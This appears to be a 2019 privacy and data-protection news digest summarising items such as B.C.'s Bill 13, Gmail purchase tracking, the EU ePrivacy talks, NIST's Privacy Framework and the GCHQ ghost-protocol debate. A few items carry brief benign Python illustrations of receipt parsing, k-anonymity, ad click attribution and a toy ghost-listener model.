B.C.’s government should scrap its proposed Community Safety Amendment Act (Bill 13) as it is harmful to marginalized members of society, a coalition of 15 civil liberties and advocacy groups said in a letter sent May 23 to Minister of Public Safety and Solicitor General Mike Farnworth. The groups said they were “deeply troubled” by the legislation, which they say would allow neighbours to report suspicions about other neighbours possibly engaged in anti-social or criminal activities, triggering a process that could result in court-ordered evictions. The law would allow people to make confidential complaints to a dedicated government unit, Farnworth said April 4 as he announced the 2013 law [which was never enacted] would be revamped and enforced. He said Bill 13 will help crack down on problem properties. Civil libertarians assert the proposed changes violate basic Canadian constitutional legal rights. “Not only does the legislation allow a person’s previous criminal convictions—no matter how long ago—to be used in court as ‘proof’ that a person is still in a criminal organization or is involved in certain activities, but it will also allow a court to draw adverse inferences about a person even in the context of someone who was found to not be criminally responsible on account of a mental disorder,” the letter said. The signatories said Bill 13 should be scrapped and the old law not enforced. “The voices behind this letter have much experience—including lived experience—with protecting and enhancing the safety of the most marginalized members of our community, in particular Indigenous women and girls,” said BC Civil Liberties Association lawyer Meghan McDermott. “We are all very familiar with how laws passed with the best of intentions can end up being used to hurt the very people the government sets out to support,” she said. The groups said while other jurisdictions have similar laws, such legislation has been used to target entire households in which all members are law-abiding except for one. Meenakshi Mannoe, community educator at Pivot Legal Society, says: “This legislation will disproportionately impact vulnerable, and often over-policed, communities which are already overrepresented in the criminal justice system, including black and Indigenous communities.” [Burnaby Now]

Consumer

WW – Shopping Habits Being Tracked Through Email

Google is tracking people’s online purchases by pulling the information from Gmail. Even for purchases made without Google’s own apps or services, the company has access to years of purchase history via receipts sent to Gmail accounts. “To help you easily view and keep track of your purchases, bookings and subscriptions in one place, we’ve created a private destination that can only be seen by you,” a Google spokesperson said, adding that the purchase history can be deleted at a user’s discretion. However, deleting the history has proven challenging because of Google’s layered privacy settings, which do not allow a one-click solution for deleting the history or making the information private, the report states. [CNBC]
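
Technically, nothing exotic is required for this: order-confirmation emails are semi-structured, so a mail provider can mine them into a purchase ledger with simple pattern matching. A toy Python illustration follows; the receipt format, regex and field names are invented for the example, and real systems use far more robust parsers:

    import re

    # Hypothetical receipt format: "Order #A123 ... Total: $59.99"
    RECEIPT_RE = re.compile(r"Order #(\w+).*?Total:\s*\$([\d.]+)", re.S)

    def purchase_history(inbox):
        """Scan message bodies and collect anything that looks like a receipt."""
        history = []
        for msg in inbox:                   # msg: {"sender": ..., "body": ...}
            match = RECEIPT_RE.search(msg["body"])
            if match:
                history.append({
                    "merchant": msg["sender"],
                    "order": match.group(1),
                    "total": float(match.group(2)),
                })
        return history

    inbox = [{"sender": "shop@example.com",
              "body": "Thanks! Order #A123 confirmed. Total: $59.99"}]
    print(purchase_history(inbox))
    # [{'merchant': 'shop@example.com', 'order': 'A123', 'total': 59.99}]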

US – Users Can Now Tell Alexa to Delete Voice Recordings

According to a report, users can now delete Alexa recordings with a pair of new voice commands. Previously, users either had to go into the app or on Amazon’s website to delete recordings. For now, users are still unable to disable long-term storage of voice recordings. Amazon is currently facing some privacy concerns, the report states, particularly around recording practices for the Echo Dot Kids device. Amazon has also launched an Alexa Privacy Hub that explains how Alexa works and where to find privacy controls. [The Verge]

EU Developments

EU – Council Still Debating e-Privacy Regulation

It looks like adoption of the e-Privacy Regulation [properly named: “Regulation of the European Parliament and of the Council concerning the respect for private life and the protection of personal data in electronic communications and repealing Directive 2002/58/EC (Regulation on Privacy and Electronic Communications)”] is still some time away, as the three-party trilogue negotiations [wiki here] between the European Parliament, Commission and the Council have not yet started due to the Council’s inability to reach a common position. According to the Council’s note of 20 May to the delegations, some Member States have repeatedly underlined concerns about the way the e-Privacy proposal would interact with new technologies, in particular in the context of Machine-to-Machine communications, the Internet of Things and Artificial Intelligence. The Presidency has now introduced numerous clarifications in the respective recitals, in particular 13, 20a and 21, addressing situations of multiple end-users and the question of consent. There have also been discussions on data retention and supervisory authorities with the aim of providing more flexibility for Member States, while respecting the requirements for independence. The Romanian Presidency says it has also introduced simplifications and clarifications with regard to cross-border cooperation (Article 20) and the role and involvement of the European Data Protection Board (Article 19). The EU Telecoms Ministers will meet on 7 June 2019, and the EU Council Presidency will move from Romania to Finland on 1 July 2019. [Privacy Laws & Business | EU Advocate General issues opinion on consent for cookies and intersection between ePrivacy-Directive and GDPR | EDPB Releases Opinion on Interplay Between the ePrivacy Directive and the GDPR and a Statement on the ePrivacy Regulation | EU Privacy Board Clarifies Overlap of Privacy Enforcement Rules | What’s the status of the draft e-Privacy Regulation?]

EU – Council of the EU Releases ePrivacy Progress Report

The Romanian Presidency of the Council of the European Union has released a progress report on the proposed ePrivacy Regulation. The update includes the “state of play” in the council, including discussions in the Working Party on Telecommunications and Information Society and at the council on “concerns about the way the ePrivacy proposal would interact with new technologies,” including machine-to-machine, internet-of-things and artificial intelligence technology. In turn, the presidency has introduced clarifications in the respective recitals to address the concerns. Discussions have also included issues involving the prevention, detection and reporting of child abuse imagery, as well as how ePrivacy would interact with existing and future data retention regimes and the provisions related to supervisory authorities, each of which member states have had diverging views. [Politico]

Finance

CA – B.C. Money Laundering Response Must Uphold Privacy Interests, Privilege: Bar Association

BC Premier John Horgan announced the creation of a commission of inquiry into money laundering in British Columbia May 15 [read PR & 2 pg terms of reference], hot on the heels of the release of a series of reviews that found significant levels of money laundering in B.C.’s real estate market and other sectors of the economy [see 367 pg PDF German report & 184 pg PDF Maloney report]. B.C. Supreme Court Justice Austin F. Cullen has been appointed to head the inquiry. The commission will deliver an interim report within 18 months and a final report by May 2021. However, some of the recommendations in the Maloney report, which is aimed at stemming the flow of dirty money in the province, have raised concern in the legal community. Recommendation 14 [at PDF pg 84], for example, suggests the B.C. minister of finance ask her federal counterpart to consider incorporating legal professionals in the anti-money laundering framework by requiring them to report suspicious transactions to the appropriate law society under the Proceeds of Crime (Money Laundering) and Terrorist Financing Act. Both the Law Society of British Columbia (LSBC) and the Federation of Law Societies (FLS) believe the privacy impact of recommendation 14 must be considered further. According to LSBC president Nancy Merrill: “The Federation of Law Societies, of which the Law Society of B.C. is a member, is currently in discussions with the federal government about potential frameworks for addressing suspicious transactions that will also respect the Supreme Court of Canada ruling on the constitutional right of Canadians to have the information that they provide to their lawyers remain confidential,” she said. Canadian Bar Association, B.C. Branch (CBABC) president Margaret Mereigh [here] said: “I think from the CBA perspective we support working collaboratively in coming up with solutions, but those actions themselves must be constitutionally sound and uphold fundamental legal principles including privacy law, privacy interests and solicitor-client privilege.” Another of Maloney’s recommendations suggests the B.C. government adopt unexplained wealth orders (UWOs) in the province [Recommendation 11 – see PDF pg 81]. UWOs involve an application to a court to confiscate property if there is a discrepancy between a person’s apparent legal income and actual visible assets, and there are reasonable grounds to suspect they are involved in crime. Micheal Vonn, policy director of the B.C. Civil Liberties Association, called the idea of UWOs an “incredibly troubling notion.” And Christine Duhaime [here] of Duhaime Law said that privacy issues are attached to some of the solutions government is considering, especially the use of information registries [see, for example, Bill C-25 coverage]. “Do you really want people to know what company you own, how much you own and where you live? Now you’ll have no privacy whatsoever, so I think it could lead to more crime where people will take bigger steps in order to protect their privacy,” she said. “Did anybody talk to the privacy commissioner? I didn’t see any impact on affected groups and there should be an impact statement on what these proposals mean.” [The Lawyers Daily | ‘An incredibly troubling notion’: Drastic new tool to fight money laundering alarms civil rights advocates | Comment: Hidden costs to crackdown on dirty money]

CA – This Overhyped ‘Money Laundering’ Panic Threatens to Rob Us of Rights

Protecting privacy is a prime obsession of politicians and business. In the ongoing national policy debate over the future role of open banking, in which all financial data can be shared among institutions, the risks to personal and corporate privacy are among the greatest concerns. How strange, then, to witness the sudden political agitation in B.C. and elsewhere for governments to enact laws that would sanction massive breaches of financial privacy by mandating disclosure of the beneficial ownership of financial and real estate assets. The trigger was a report from B.C. which claimed that in 2015 criminals washed $7.4 billion through the province. Countrywide, the panel claimed, the national Maytag machine processed $47 billion in criminal cash [see 184 pg PDF]. The panel itself admitted the numbers are speculative. To halt this flow of allegedly illegal money it zeroed in on one key proposal: “Disclosure of beneficial ownership is the single most important measure that can be taken to combat money laundering but is regrettably under-used both internationally and in Canada.” (The italics are theirs.) Likewise, a recent brief from Canada’s C.D. Howe Institute proposed radical disclosure of the real owners of all corporations, business trusts and real estate in Canada [see 12 pg PDF], including “…full legal name and all other names by which the registrant is commonly known, occupation, citizenships and country of tax residence.” The major flaw in the current Canadian freak-out over “money laundering” is that the activity is not necessarily criminal: hiding the ownership and origin of money and assets isn’t necessarily a crime, and the ability to do so could even be for the good. In fact, it is probable that much of the money (whatever the number) comes from countries — China, Russia, Venezuela — where political risks are high and corruption is prevalent. Even if it’s true that some investors here might be trying to evade oppressive taxes at home, that’s a problem for their home country, not Canada. There are also no doubt many non-criminal Canadians with their own personal reasons for secrecy. They should be protected against excessive government laws that would deprive them of the same right to privacy that our governments claim to want to protect. Non-criminal users of beneficial-ownership structures in Canada and around the world have good personal and corporate reasons for moving money around without disclosing their identities and their activities. As a society we don’t need to know what those reasons are to appreciate that people are entitled to their freedom, including the right not to be forced to reveal personal financial, business and corporate information for public consumption via the internet. Tracking down national and international criminals is the work of police and regulators, provided they don’t abuse the rights of non-criminals. Using money laundering as a scare to justify what appear to be extreme breaches of privacy takes the pursuit of crime a little too far. It’s not unlike making wiretaps of all citizens legal in order to track down a few bad guys. [Financial Post | New federal corporate rules raise privacy alarm bells | B.C. money laundering response must uphold privacy interests, privilege: bar association | ‘An incredibly troubling notion’: Drastic new tool to fight money laundering alarms civil rights advocates | Comment: Hidden costs to crackdown on dirty money]

Health / Medical

US – OCR Releases New FAQs on Use of Health Apps

Building on its earlier guidance, the U.S. Department of Health and Human Services Office for Civil Rights (OCR) has released a new set of Health Insurance Portability and Accountability Act (HIPAA) FAQs that discuss the applicability of HIPAA to covered entities and business associates that interact with health apps, and explain when HIPAA-regulated entities may be held vicariously liable for data breaches experienced by health app providers. The FAQs reiterate that a covered entity [see here] will not be liable for a breach of health information if the health app is not provided by or on behalf of the covered entity. Determining whether an app was developed for, or provided for or on behalf of, a HIPAA-regulated entity can be difficult given increasingly complicated business structures in the health care industry and the variety of technology solutions available in the market. For example, it is unclear how customized a technology solution must be for it to be “developed for, or provided for or on behalf of” a HIPAA-regulated entity. For this reason, it is important to fully understand the relationship of the parties and the technology involved to properly analyze potential HIPAA risk exposure from using third-party technology. To read more on the new HIPAA FAQs and the potential impact on the use of third-party technology solutions, see Reed Smith’s Life Sciences Legal Update blog post [here]. [Technology Law Dispatch (ReedSmith)]

US – HHS Releases Fact Sheet on Business Associates’ Liability Under HIPAA

The U.S. Department of Health and Human Services’ Office for Civil Rights released a fact sheet on the provisions of the Health Insurance Portability and Accountability Act Rules for which a business associate can be held directly liable. The OCR has the authority to take enforcement action against business associates for failure to provide breach notifications to a covered entity, impermissible uses and disclosures of protected health information (PHI), failure to make a reasonable effort to limit PHI to the minimum necessary for an intended task, and failure to provide compliance reports or cooperate with complaint investigations and compliance reviews. [HHS.gov]

Horror Stories

US – Facebook User Privacy Lawsuits Over Cambridge Analytica Have Legs

In San Francisco on May 29, U.S. District Judge Vince Chhabria indicated he won’t dismiss lawsuits brought on behalf of tens of millions of users who blame Facebook for allowing their private information, mined from their friends’ accounts, to be shared with a British political consultancy. The case is In Re Facebook Consumer Privacy User Profile Litigation, 18-MD-02843, U.S. District Court, Northern District of California (San Francisco) [see docket]. Chhabria is overseeing dozens of suits alleging users have no real control over their personal information, and that the company has repeatedly misled users in order to continue mining it. The suits have a long way to go before users stand a chance of claiming billions of dollars in damages. Chhabria isn’t addressing the merits of the complaints, only deciding whether the allegations are legally sufficient to proceed. The next step will be for users to seek internal information from the company to back up their claims. Users contend intrusions on their privacy have continued despite a 2011 agreement with the FTC barring the social network from extracting personal data without their knowledge. The lawsuits filed in San Francisco federal court identify one practice described as particularly deceptive: extracting information from users who adjusted their privacy settings to share information with “Friends Only” by collecting it from those friends. Chhabria signaled he’ll let the case go forward based on users’ claim that Facebook illegally disclosed their private information. Facebook is mistakenly treating its users’ expectation of privacy as a “binary,” or all-or-nothing, proposition, Chhabria told the company’s lawyers. “If I don’t share a certain something with anybody, I have a full expectation of privacy,” Chhabria said. “If I share it with ten people it doesn’t eliminate my expectation of privacy. It may diminish it, but it doesn’t eliminate it.” Just because Facebook is helping users share information with each other, Chhabria added, doesn’t mean they understand they’re also taking on the risk that the company “will then turn around and disseminate it to a thousand different corporations.” [Bloomberg]

US – Hackers Breach US License Plate Scanning Company

One of the US’s most widely used vehicle license plate reader (LPR) companies, Perceptics, is reportedly investigating a data breach after news site The Register was sent files stolen from it last week. The company is probably best known for designing the license plate imaging systems used at US border crossings with Mexico and Canada. A hacker using the identity “Boris Bullet-Dodger” claimed to have compromised the company, providing The Register with a list of 34 compressed directories, amounting to hundreds of gigabytes and almost 65,000 files, as evidence. Some look like software development directories, covering file types such as .htm, .html, .txt, .doc, .asp, .tdb, .mdb, .json, .rtf, .xls, and .tif. More concerning are directories such as Platedatabase.rar and Plateworkbench.rar, and image files the site speculates could be license plate captures. The most recent directory has a date stamp of 17 May 2019, which underlines how recently the data appears to have been pilfered and suggests it is current, and therefore more valuable. According to The Register, Perceptics confirmed that some kind of data compromise had happened, without offering further details. [Naked Security (Sophos)]

Identity Issues

US – Tech Companies Push Back Against ‘Age-Gate’ Proposals

Technology, media and gaming companies are pushing back against proposed rules by the U.K. Information Commissioner’s Office that would require them to create child-friendly versions of their sites. Companies could also be required to “age-gate” their websites by collecting proof of age for each user. It is unclear what the ICO will require for proof, but it is expected websites would be required to collect passports or driver’s licenses. Tech companies are concerned the proposed rules would have a financial impact on start-ups if they are required to provide multiple versions of their site, while also raising concerns that individuals would have to hand over personal data to access websites. The consultation period on the proposed rules ends soon, and the proposed regulations are expected to go to Parliament later this year. [Financial Times]

WW – Microsoft Puts Focus on Decentralized IDs

Microsoft has committed to supporting decentralized identities. Microsoft Corporate Vice President of the Identity Division Joy Chik said the tech company participates in the Decentralized Identity Foundation in order to help balance the data relationship between the individual and organizations. Chik said Microsoft has worked to include decentralized identities in its platforms in order to maintain mutual trust between the two groups. The EU General Data Protection Regulation helped show Chik that “identity is central to privacy,” adding that since organizations have more control over personal data than the individual, more work needs to be done to balance the responsibility. [Computer Weekly]

Online Privacy

CA – Canadian Anonymization Network Launched

The Canadian Anonymization Network (CANON) is an informal network of data custodians from across the private, public and health sectors whose primary purpose is to promote anonymization as a privacy-respectful means of leveraging data for innovative and beneficial purposes. Co-founded by AccessPrivacy, Privacy Analytics, Symcor and TELUS, with additional sponsorship from Bell, Rogers, TD and TransUnion, CANON has quickly grown to include some of the largest data custodians from private, public and health institutions across the country. In his announcement on Tuesday, the Minister of Innovation, Science and Economic Development (ISED) unveiled Canada’s new Digital Charter, along with proposals for modernizing the Personal Information Protection and Electronic Documents Act (PIPEDA). The document is filled with encouraging signs of support for codes of practice and industry standards. Among the areas the Government will be consulting on are: 1) concepts of de-identification and pseudonymization; 2) an acceptable threshold of re-identification risk (see the sketch below); 3) prohibitions against intentional re-identification; and 4) possible new governance models, such as data trusts. The public launch of CANON is a timely stakeholder-led initiative to begin to collectively address many of these and related questions over the next few months. Visit the CANON website — https://deidentify.ca/ — for more information about CANON’s objectives, deliverables, key success indicators, and membership. [Access Privacy (Osler)]
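For readers who want to see how a re-identification risk threshold might be operationalized, here is a minimal sketch in Python. It assumes a toy dataset with invented column names; nothing here comes from CANON’s materials. It computes k-anonymity, one common risk measure: the smaller the smallest group of records sharing the same quasi-identifiers, the higher the re-identification risk.

```python
# A minimal k-anonymity check -- illustrative only; the records, column names
# and any threshold chosen are assumptions, not CANON guidance.
from collections import Counter

def k_anonymity(records, quasi_identifiers):
    """Return the size of the smallest equivalence class: every combination
    of quasi-identifier values is shared by at least this many records."""
    groups = Counter(tuple(r[q] for q in quasi_identifiers) for r in records)
    return min(groups.values())

records = [
    {"age_band": "30-39", "postal_prefix": "M5V", "diagnosis": "flu"},
    {"age_band": "30-39", "postal_prefix": "M5V", "diagnosis": "asthma"},
    {"age_band": "40-49", "postal_prefix": "V6B", "diagnosis": "flu"},
]

k = k_anonymity(records, ["age_band", "postal_prefix"])
print(k)  # 1: the V6B record is unique on its quasi-identifiers, so risk is high
```

A regulator-set threshold would then translate into a simple release rule such as "do not publish unless k >= 5," with generalization or suppression applied until the dataset passes.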

US – Personal Data Being Transmitted from Phones While Users Sleep

From his own research, technology columnist Geoffrey Fowler reports that 5,400 hidden app trackers siphoned data from his iPhone over the course of a week, much of it while he was sleeping. Fowler did his research with privacy firm Disconnect, which said Fowler’s phone would have transmitted 1.5 gigabytes of data over a full month. “This is your data. Why should it even leave your phone? Why should it be collected by someone when you don’t know what they’re going to do with it?” Disconnect Chief Technology Officer Patrick Jackson said. “I know the value of data, and I don’t want mine in any hands where it doesn’t need to be.” The research also showed Fowler’s phone was reporting information such as his phone number, email address, exact location and device fingerprint, helping trackers link activity to his phone. [Washington Post]

WW – Complaints Filed With DPAs Over Real-Time Bidding

Complaints have been filed with the data protection authorities of Spain, Belgium, Luxembourg and the Netherlands over the online advertising industry’s use of real-time bidding, according to an advocacy website. The complainants allege real-time bidding violates the EU General Data Protection Regulation. The new round of complaints is an extension of those filed with the DPAs in Ireland, Poland and the U.K. “We hope that this complaint sends a strong message to Google and those using Ad Tech solutions in their websites and products,” said Eticas CEO Gemma Galdon Clavell, one of the individuals who filed the complaints. “Data protection is a legal requirement that must be translated into practices and technical specifications.” [Fix AdTech]

WW – Researchers Find Benefits of Behaviorally Targeted Ads Overstated

Researchers have found that behaviorally targeted advertising may not have a major financial impact for organizations: the study found publishers get only 4% more revenue from an ad impression that is cookie-enabled than from one that is not. Lawmakers may look to the value of targeted ads as they continue to shape a federal privacy law. “All of these externalities with regard to the ad economy — the harm to privacy, the expansion of government surveillance, the ability to microtarget and drive divisive content — were often justified to industry because of this ‘huge’ value to publishers,” former U.S. Federal Trade Commission Chief Technologist Ashkan Soltani said. Meanwhile, tech and media companies continue to prepare for the implementation of the California Consumer Privacy Act. [WSJ.com]

Other Jurisdictions

WW – ICDPPC Releases May Newsletter

The International Conference of Data Protection and Privacy Commissioners published its May newsletter, highlighting its 41st conference that will take place Oct. 21 to 24 in Tirana, Albania. Albanian Information and Data Protection Commissioner Besnik Dervishi provided an update on the conference’s programming and side events. The newsletter also featured the unveiling of the ICDPPC’s commitment to secondment programs, a conversation with Ghana Data Protection Commission Executive Director Patricia Poku, and a look at the Ibero-American Data Protection Network. [ICDPPC]

Privacy (US)

US – NIST to Host Privacy Framework Workshop July 8–9

The U.S. National Institute of Standards and Technology will host its latest workshop on the development of its Privacy Framework July 8-9 in Boise, Idaho. The workshop will be held at Boise State University and is open to the public. Attendees will have the opportunity to engage in discussions to advance the framework’s development. Additional information, including pre-read materials, will be released closer to the date of the event. [NIST.gov]

US – NIST Continues to Make Progress on its Privacy Framework

The National Institute of Standards and Technology’s (NIST) development of a new Privacy Framework [FAQ] is progressing. On May 13-14, 2019, NIST hosted its second workshop [see details & docs here] on the recently released discussion draft of its “Privacy Framework: An Enterprise Risk Management Tool” [read 38 pg PDF here]. NIST is expected to publish a full summary and a recording of the opening half-day of the workshop in the next couple of weeks. The workshop brought together stakeholders to provide feedback on the draft and suggest areas for revision. NIST had previously hosted a workshop in October 2018 to kick off the development of the Privacy Framework and had presented its thinking at other fora such as the Brookings Institution [see Workshop #1 here & the coming July 2019 Workshop #3 here]. There will be a webinar discussion on May 28 to follow up on the recent workshop, including an opportunity to ask questions and present feedback on the discussion draft. The discussion draft of the Privacy Framework attempts to follow the model of NIST’s Cybersecurity Framework released in 2014 [see here]. The draft outlines objectives for organizations to pursue that are focused around core themes. NIST’s stated intention is that organizations may choose whether to use the two frameworks together or independently of one another. The draft Privacy Framework describes five core privacy “functions” for organizations to develop and implement that track the life cycle of an organization’s management of privacy risk:

  1. Identify (organizational understanding of privacy risk);
  2. Protect (appropriate data processing safeguards);
  3. Control (data management measures);
  4. Inform (communication about data processing activities); and
  5. Respond (privacy breach mitigation and redress).

One aspect of the Privacy Framework that was commended during the recent workshop, and is not expected to undergo significant revisions, is the “Privacy Risk Management Practices” appendix [read at pg 31 of 38 pg PDF] that outlines key steps for organizations to undertake in managing privacy risk. These include organizing preparatory resources, determining privacy capabilities, conducting privacy risk assessments, and creating privacy requirements traceability. The Privacy Framework is likely to become an important resource for companies building out their compliance programs for the California Consumer Privacy Act and/or the European Union’s General Data Protection Regulation, and for companies anticipating the eventual enactment of additional federal privacy legislation. [HL Chronicle of Data Protection (Hogan Lovells) | NIST Privacy Framework Takes Shape | NIST Outlines Privacy Framework, Taking a Page from Past Cybersecurity Efforts | RSA Conference 2019: NIST’s Privacy Framework Starts to Take Shape]

WW – Study Brings Clarity to Children’s Definition of ‘Creepy’ Tech

New research from the University of Washington offers a better sense of what children mean when they deem certain technology “creepy.” The study was based on the responses of 11 children, ranging from ages 7 to 11, who were asked to rank various tech products as “creepy,” “not creepy” or “don’t know.” Devices that evoked thoughts of pain and/or divisiveness were the most likely to be called creepy. The research also yielded a list of common tech properties that created fear among children and a separate list of questions for adults to ask their children regarding tech use. Meanwhile, Fast Company reports U.S. lawmakers are considering updates to the Children’s Online Privacy Protection Act that would address new risks associated with social media and internet-of-things devices. [Geekwire]

US – Lawsuit Claims iTunes Information Sold to Third Parties

A class-action federal lawsuit has been filed against Apple by customers who claim information from their iTunes purchases was sold to third parties. Three plaintiffs from Rhode Island and Michigan claim Apple mined and sold their information despite Apple’s “pro-consumer positions on issues of data privacy.” The lawsuit also claims the data collection was done in violation of their states’ privacy laws. According to Apple’s privacy policy, it only collects “non-personal information” that is not directly connected to individual users. Apple says the information is “used to help us provide more useful information to our customers and to understand which parts of our website, products and services are of most interest.” [Billboard]

Privacy Enhancing Technologies (PETs)

WW – New Privacy Tech Helps Privatize Ad Clicks

Apple’s WebKit has released new technology that allows ad clicks to be attributed while maintaining the privacy of those clicking. The technology seeks to replace the traditional machinery of ad click measurement, which relies on user cookies and cross-site tracking to gather information on ad performance and to target further ad deployment. WebKit is basing its technology on Apple’s “Privacy Preserving Ad Click Attribution,” a three-step process that allows companies to continue measuring ad performance without scraping data from, or tracking, the people who click. [Webkit]
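As a rough illustration of the mechanism, here is a conceptual sketch in Python. This is a toy model, not WebKit’s actual API: the 6-bit campaign-ID cap and the 24-48 hour randomized reporting delay come from the public proposal, but the class and method names are invented. The point it demonstrates is that the browser, not the ad network, holds the click data, caps its entropy and reports conversions late, so the report cannot be tied back to an individual user.

```python
# Toy model of Privacy Preserving Ad Click Attribution (illustrative only).
import random

class BrowserAttributionStore:
    MAX_CAMPAIGN_ID = 63  # the proposal caps campaign IDs at 6 bits of entropy

    def __init__(self):
        self.pending = {}  # (source_site, dest_site) -> campaign_id

    def record_click(self, source_site, dest_site, campaign_id):
        # The browser, not the ad network, remembers the click.
        if campaign_id > self.MAX_CAMPAIGN_ID:
            raise ValueError("campaign id exceeds the entropy cap")
        self.pending[(source_site, dest_site)] = campaign_id

    def record_conversion(self, source_site, dest_site):
        # On conversion, schedule a delayed report with no user identifier.
        campaign_id = self.pending.pop((source_site, dest_site), None)
        if campaign_id is None:
            return None
        delay_hours = random.uniform(24, 48)  # randomized 24-48h delay
        return {"source": source_site, "dest": dest_site,
                "campaign": campaign_id, "send_after_hours": round(delay_hours)}

store = BrowserAttributionStore()
store.record_click("news.example", "shop.example", campaign_id=12)
print(store.record_conversion("news.example", "shop.example"))
```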

Security

CA – Public Safety Canada Releases New Guide on Cybersecurity

Public Safety Canada (Public Safety) recently released Enhancing Canada’s Critical Infrastructure Resilience to Insider Risk [PR], a guide designed to assist Canadian organizations in developing effective programs to mitigate and respond to security threats from insiders. Critical infrastructure is broadly defined as “processes, systems, facilities, technologies, networks, assets and services essential to the health, safety, security or economic well-being of Canadians and the effective functioning of government.” Public Safety has identified the following 10 industries with critical infrastructure that requires security partnerships between governments (federal and provincial) and industry stakeholders: health, food, finance, water, information and communication technology, safety, energy and utilities, manufacturing, government, and transportation. The Guide recommends that organizations adopt policies, procedures and appropriate controls to create a culture of security that places responsibility on all employees. Senior management’s engagement and accountability are the cornerstone of employee buy-in. Security should be championed by a senior executive responsible for developing a security policy with support from a working group consisting of human resources, legal, privacy, communications, technology and security. The Guide also recommends developing clear security policies through employee education, training and screening measures. These should apply to all employees, contractors and subcontractors. To reduce risks from business partners, it is recommended that organizations build long-term relationships with key service providers. Prior to entering into these relationships, risk assessments identifying security concerns regarding access to systems and data should be undertaken. Analyzing the internal security of third-party service providers, including background checks of employees and establishing third-party security agreements, is recommended. Insider risk is a danger to all organizations but can be mitigated through implementing policies and actions that emphasize employee engagement, monitoring technology usage and data movement, and having backup and recovery plans in place. The holistic approach recommended by Public Safety begins before people are granted access to critical infrastructure and continues throughout that employee’s/third party’s time with the organization. Where cost and resources limit full implementation, administering the organization’s most critical policies would be beneficial. [Business Class (Blakes)]

Smart Cars / Cities

US – Report Highlights Privacy Risks of Smart-City Transportation Systems

Smart cities use real-time tracking to help reduce traffic congestion and improve public transportation systems. However, the parallel use of facial-recognition cameras, license plate readers, mobile phone data and other technologies to track people on roadways or public transportation raises privacy concerns for researchers at the International Data Corporation. In the report “Surveillance Avenue – Urban Mobility and Addressing the Erosion of Privacy,” the researchers highlight that without proper protection of personal data, that information could be misused. They encourage the federal government to enact broad regulations to protect individuals’ privacy and ensure “transportation-related” data is used responsibly. [NextGov]

US – Pittsburgh City Council Mulls Smart-City Data-Sharing Agreement

Pittsburgh city council has tentatively approved a proposal that would allow two city departments to enter into agreements with “various entities” to receive data that furthers the city’s ability to deliver services to residents. The data includes traffic information from Waze and Uber that the city council says will help with infrastructure planning. The council’s lone holdout, Councilwoman Deb Gross, says the legislation, as currently written, gives wide-open authorization to city departments to enter into agreements with data companies without first requiring council approval. Council members agree more data leads to better public policy, but Gross would like to narrow the scope of the legislation before the final vote Tuesday. [Post-Gazette.com]

Surveillance

UK – Apple, Google, Microsoft, WhatsApp Sign Open Letter Condemning GCHQ Proposal to Listen in on Encrypted Chats

Under the auspices of the Open Technology Institute, an international coalition of civil society organizations, security and policy experts and tech companies, including Apple, Google, Microsoft and WhatsApp, has penned a critical slap-down [see OTI PR, blog & 9 pg letter] of a surveillance proposal that would allow intelligence or law enforcement agencies to be invisibly CC’d by service providers into encrypted communications, warning it would undermine trust and security and threaten fundamental rights. The proposal was made last year by the UK’s intelligence agency GCHQ [here] in an article published last fall on the Lawfare blog, written by the National Cyber Security Centre’s (NCSC) Ian Levy and GCHQ’s Crispin Robinson (NB: the NCSC is a public-facing branch of GCHQ), which they said was intended to open a discussion about the ‘going dark’ problem that robust encryption poses for security agencies. Levy and Robinson argued that such an “exceptional access mechanism” could be baked into encrypted platforms to enable end-to-end encryption to be bypassed by state agencies, which could instruct the platform provider to add them as a silent listener to eavesdrop on a conversation, but without the encryption protocol itself being compromised. In their letter the coalition writes: “The GCHQ’s ghost protocol creates serious threats to digital security: if implemented, it will undermine the authentication process that enables users to verify that they are communicating with the right people, introduce potential unintentional vulnerabilities, and increase risks that communications systems could be abused or misused. These cybersecurity risks mean that users cannot trust that their communications are secure, as users would no longer be able to trust that they know who is on the other end of their communications, thereby posing threats to fundamental human rights, including privacy and free expression. Further, systems would be subject to new potential vulnerabilities and risks of abuse.” There are more than 50 signatories to the letter in all, including other civil society and privacy rights groups such as Human Rights Watch, Reporters Without Borders, Liberty, Privacy International and the EFF, as well as veteran security professionals such as Bruce Schneier, Philip Zimmermann and Jon Callas, and policy experts such as former FTC CTO and White House security advisor Ashkan Soltani. [TechCrunch | Apple, Google and WhatsApp condemn UK proposal to eavesdrop on encrypted messages | Apple and WhatsApp condemn GCHQ plans to eavesdrop on encrypted chats]
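To make the coalition’s authentication argument concrete, here is a deliberately simplified toy model in Python. It uses no real cryptography, and every name in it is invented for illustration. It shows the trust failure the letter describes: if the service controls the recipient list a client encrypts to, it can silently append a listener without changing anything the sender is able to verify.

```python
# Toy model of the "ghost listener" problem -- no real cryptography here.
def encrypt_for(recipients, plaintext):
    # Stand-in for per-recipient public-key encryption.
    return {r: f"enc[{r}]({plaintext})" for r in recipients}

def send_message(server_recipient_list, plaintext):
    # The client encrypts for whatever membership list the server supplies.
    return encrypt_for(server_recipient_list, plaintext)

honest_list = ["alice", "bob"]
ghosted_list = honest_list + ["silent-listener"]  # injected by the service

ciphertexts = send_message(ghosted_list, "meet at noon")
print(sorted(ciphertexts))  # ['alice', 'bob', 'silent-listener']
# The sender's UI showed only alice and bob; it is the authentication of
# group membership, not the encryption itself, that the proposal breaks.
```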

WW – Amazon Working on an Emotion-Tracking Alexa Wearable

According to a Bloomberg news item, Amazon is working on a wearable wellness device said to be able to determine a user’s emotional state. This comes on the heels of patents issued to the company for technology designed to let Alexa determine a speaker’s mood and respond accordingly based on how they’re feeling [see here & here], highlighting relevant emotions like “happiness, joy, anger, sorrow, sadness, fear, disgust, boredom and stress.” That’s a pretty wide range of reactions for a smart assistant. The smartphone-connected, wrist-worn device is said to be the product of the Alexa and Lab126 hardware team. It’s currently being tested, internally, under the code name “Dylan.” It’s worth noting that Amazon has recently been encouraging a lot of experimentation among its internal hardware team, especially when it comes to Alexa products. Among other things, that experimentation has led to the creation of Echo Buttons. Most experiments, however, haven’t made it past the trial phase. Amazon’s tight-lipped on the matter, and the anonymous folks who’ve been discussing the device haven’t offered any info on a potential time frame. All we know for sure is that Amazon is looking to get Alexa onto as diverse an array of products as possible, and this certainly qualifies. [TechCrunch | Amazon is working on a wearable that can read your emotions, report says | Amazon Is Getting Closer to Building an Alexa Wearable That Knows When You’re Depressed]

WW – Amazon Considered Letting Alexa Listen to You Without A Wake Word

